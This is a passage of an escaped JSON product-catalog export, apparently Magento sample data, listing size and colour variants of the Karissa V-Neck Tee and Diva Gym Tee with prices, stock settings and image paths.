Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"karissa-v-neck-tee-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws10-red_back.jpg\",\"image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws10-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"1476\":{\"sku\":\"WS10-XL-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Karissa V-Neck Tee-XL-Yellow\",\"description\":\"<p>The Karissa V-Neck Tee features a semi-fitted shape that\'s flattering for every figure. You can hit the gym with confidence while it hugs curves and hides common \\\"problem\\\" areas.<\\/p>\\n<p>&bull; Pink heather soft v-neck tee. <br \\/>&bull; Luma signature micro sleeves.<br \\/>&bull; Semi-fitted. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"karissa-v-neck-tee-xl-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws10-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Yellow\"},\"1477\":{\"sku\":\"WS10\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Karissa V-Neck Tee\",\"description\":\"<p>The Karissa V-Neck Tee features a semi-fitted shape that\'s flattering for every figure. You can hit the gym with confidence while it hugs curves and hides common \\\"problem\\\" areas.<\\/p>\\n<p>&bull; Pink heather soft v-neck tee. <br \\/>&bull; Luma signature micro sleeves.<br \\/>&bull; Semi-fitted. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tee,material=Cotton|EverCool&trade;,pattern=Solid,climate=Indoor|Warm,eco_collection=No,performance_fabric=Yes,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WS10-XS-Green,size=XS,color=Green|sku=WS10-XS-Red,size=XS,color=Red|sku=WS10-XS-Yellow,size=XS,color=Yellow|sku=WS10-S-Green,size=S,color=Green|sku=WS10-S-Red,size=S,color=Red|sku=WS10-S-Yellow,size=S,color=Yellow|sku=WS10-M-Green,size=M,color=Green|sku=WS10-M-Red,size=M,color=Red|sku=WS10-M-Yellow,size=M,color=Yellow|sku=WS10-L-Green,size=L,color=Green|sku=WS10-L-Red,size=L,color=Red|sku=WS10-L-Yellow,size=L,color=Yellow|sku=WS10-XL-Green,size=XL,color=Green|sku=WS10-XL-Red,size=XL,color=Red|sku=WS10-XL-Yellow,size=XL,color=Yellow\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws10-red_back.jpg\",\"image\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws10-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws10-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tee\",\"material\":\"Cotton|EverCool&trade;\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1478\":{\"sku\":\"WS11-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Diva Gym Tee-XS-Green\",\"description\":\"<p>The Diva Gym Tee feels like your favorite right out of the mailbox. Micro-sleeved, lightweight and extra comfortable, it\'s a casual staple that hides incredible comfort behind a laid-back, carefree look.<\\/p>\\n<p>&bull; Bright yellow v-neck tee.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Long-Sleeves. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"diva-gym-tee-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"1479\":{\"sku\":\"WS11-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Diva Gym Tee-XS-Orange\",\"description\":\"<p>The Diva Gym Tee feels like your favorite right out of the mailbox. Micro-sleeved, lightweight and extra comfortable, it\'s a casual staple that hides incredible comfort behind a laid-back, carefree look.<\\/p>\\n<p>&bull; Bright yellow v-neck tee.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Long-Sleeves. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"diva-gym-tee-xs-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Orange\"},\"1480\":{\"sku\":\"WS11-XS-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Diva Gym Tee-XS-Yellow\",\"description\":\"<p>The Diva Gym Tee feels like your favorite right out of the mailbox. Micro-sleeved, lightweight and extra comfortable, it\'s a casual staple that hides incredible comfort behind a laid-back, carefree look.<\\/p>\\n<p>&bull; Bright yellow v-neck tee.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Long-Sleeves. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"diva-gym-tee-xs-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws11-yellow_back.jpg\",\"image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws11-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Yellow\"},\"1481\":{\"sku\":\"WS11-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Diva Gym Tee-S-Green\",\"description\":\"<p>The Diva Gym Tee feels like your favorite right out of the mailbox. Micro-sleeved, lightweight and extra comfortable, it\'s a casual staple that hides incredible comfort behind a laid-back, carefree look.<\\/p>\\n<p>&bull; Bright yellow v-neck tee.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Long-Sleeves. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"diva-gym-tee-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"1482\":{\"sku\":\"WS11-S-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Diva Gym Tee-S-Orange\",\"description\":\"<p>The Diva Gym Tee feels like your favorite right out of the mailbox. Micro-sleeved, lightweight and extra comfortable, it\'s a casual staple that hides incredible comfort behind a laid-back, carefree look.<\\/p>\\n<p>&bull; Bright yellow v-neck tee.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Long-Sleeves. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"diva-gym-tee-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},\"1483\":{\"sku\":\"WS11-S-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Diva Gym Tee-S-Yellow\",\"description\":\"<p>The Diva Gym Tee feels like your favorite right out of the mailbox. Micro-sleeved, lightweight and extra comfortable, it\'s a casual staple that hides incredible comfort behind a laid-back, carefree look.<\\/p>\\n<p>&bull; Bright yellow v-neck tee.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Long-Sleeves. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"diva-gym-tee-s-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"